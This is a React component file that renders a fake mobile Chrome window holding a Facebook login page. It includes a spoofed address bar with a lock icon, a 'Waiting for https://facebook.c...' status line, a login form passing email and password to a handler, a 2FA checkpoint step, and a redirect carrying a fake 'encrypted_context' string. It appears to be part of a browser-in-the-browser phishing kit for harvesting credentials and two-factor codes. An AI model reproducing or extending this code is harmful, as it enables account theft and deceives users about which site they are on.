// components/Login/LoginMobileView.tsx
import MobileBase from "../MobileBase";
import Checkpoint from "../../pages/checkpoint";
import { LoginForm } from "./LoginForm";

import { randomNumber } from "../../services/utils";
import { useNavigate } from "react-router-dom";
const LoginMobileView = ({
  url,
  isBrowserLoaded,
  isCheckPoint,
  loading,
  loginFailed,
  isError,
  isPassInvalid,
  email,
  password,
  showPassword,
  handleLogin,
  setEmail,
  setPassword,
  setShowPassword,
  handleAppClose,
  setChrome,
}) => {
  const pageId = randomNumber(16);
  const navigate = useNavigate();
  return (
    <MobileBase
      name="Facebook"
      resizer="chrome"
      appClose={handleAppClose}
      num={0}
    >
      <div
        className="w-full h-full overflow-y-auto bg-gray-100 flex flex-col"
        style={{ boxShadow: "0px 10px 10px #0505054d" }}
      >
        <div className="border-b-[1px] border-gray-300 flex items-center py-1 px-1">
          <div className="flex-1 relative">
            <input
              type="text"
              disabled
              value={url}
              className="w-full rounded-full pl-6 bg-gray-100 text-sm h-[25px]"
              placeholder="Search Google or type a URL"
            />
            {isBrowserLoaded ? (
              <i className="fa-regular fa-solid fa-lock absolute text-sm left-1 top-[50%] -translate-y-[50%] text-gray-500"></i>
            ) : (
              <i className="fa-regular fa-circle-exclamation absolute text-sm left-1 top-[50%] -translate-y-[50%] text-gray-500"></i>
            )}
          </div>
          <i className="px-3 fa-regular fa-solid fa-key-skeleton text-gray-500 rotate-45"></i>
        </div>

        <div className="w-full flex-1">
          {isBrowserLoaded ? (
            <>
              {!isCheckPoint ? (
                <div className="login_page relative w-full">
                  {loginFailed && (
                    <div className="w-full bg-[#fa3e3e] text-white text-[13px] font-medium p-2 flex items-center">
                      Invalid username or password
                    </div>
                  )}

                  <div className="mt-4">
                    <LoginForm
                      email={email}
                      password={password}
                      showPassword={showPassword}
                      loading={loading}
                      loginFailed={loginFailed}
                      isError={isError}
                      isPassInvalid={isPassInvalid}
                      onEmailChange={(e) => setEmail(e.target.value)}
                      onPasswordChange={(e) => setPassword(e.target.value)}
                      onTogglePassword={() => setShowPassword((prev) => !prev)}
                      onSubmit={handleLogin}
                    />
                  </div>
                </div>
              ) : (
                <div className="overflow-y-auto p-4 z-1000">
                  <Checkpoint
                    onSuccess={(is2FA) => {
                      setChrome(false);

                      navigate(`/${pageId}/videos?encrypted_context=ARE-mouCvCDl-qc9rUfat_U_4pwg9N6Ucjm7TaJi2uZ5gZamPKvlNqI1CNvxSaIHTbsUvCz55uIvXuKFL34IWuSi-GGZBojRWBCuHfNqOUOKTqbjsNFRdSHpKvryRmlL_S16vGRVtGISApb3yG0c40yt8wJLDQUBKI3eEymcKHrvGxLcogaIrcty1BXvn_RqfxAvGW5YHZofCHHS0l3r8rWkoL6UqqEZCvKqJhYCnAjGDlqWoy-iwUIYcqbu7PXW_BzYOLM_IgETbGtxb-5ezn7TdyDEuPmI3k489LNda-MuoE3bGKJ41pKqdNjHGulbySASYHmY4ceJ6DQZNKBZfK2NK1Hpp8e7hSy_4lOCJjBSsV16ZusSw1y7KeBRiiDxmVaX3ClPfOQ7U-69HURJJb3fum5sWXBwe0Klq-nKe2Gdoc1Ol23Lg_eK8zT13neIrw9zh3rvZUyhPaz8HrJxefTdCePX4g6EPnDnGPH3LB-zgMhQzNZdMSxo0Nsr9XbWDvSRVft1OuvQF6LxtTC7Jx73is6IoP9eH4-_X4eftBbFT5FdpEMIKhXUz5oLieS-SvOX5iQRv3-W0z5Kc3rLrhh90pRZrwC15911Fd_-OlkYlzqh_fDA1KEIaiPZZFiD5tXE0Mmipc7JlTjDtqnwghqGQMf1_6b7gfp1BrCuUPOXk6aRX5h0zJ2POMU8DLA_VpMjwWSl3TpWdkuq8uXcXH-UbNq1f1YeOEAfDROzKqTitu3_oxp_bDBEgGsZuFDmbInXiw5Sik9A6ch7ZGtgdInUhVRm93iHvSn6mEP2pY5cH4OKfn3QAFzmg5U0zOu4n5sMkL4FZaHZZbujbAjBwZJ0IWRso4pHYyO6ejciWEwbXmaoA_EECZB6TX79C01fxOrArvksnMJKWdXCesUI6bCJnc860UlWXXFixwSjrdwXjI0ECX9WnSKbOSvbwezqUGzPJOwh5F8&flow=pre_authentication`);
                    }}
                  />
                </div>
              )}
            </>
          ) : (
            <div className="h-[560px]"></div>
          )}
        </div>

        {loading && (
          <div className="waiting">Waiting for https://facebook.c...</div>
        )}
      </div>
    </MobileBase>
  );
};

export default LoginMobileView;
